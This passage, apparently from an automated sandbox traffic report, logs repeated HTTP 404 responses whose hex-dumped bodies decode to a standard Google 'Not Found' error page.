70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 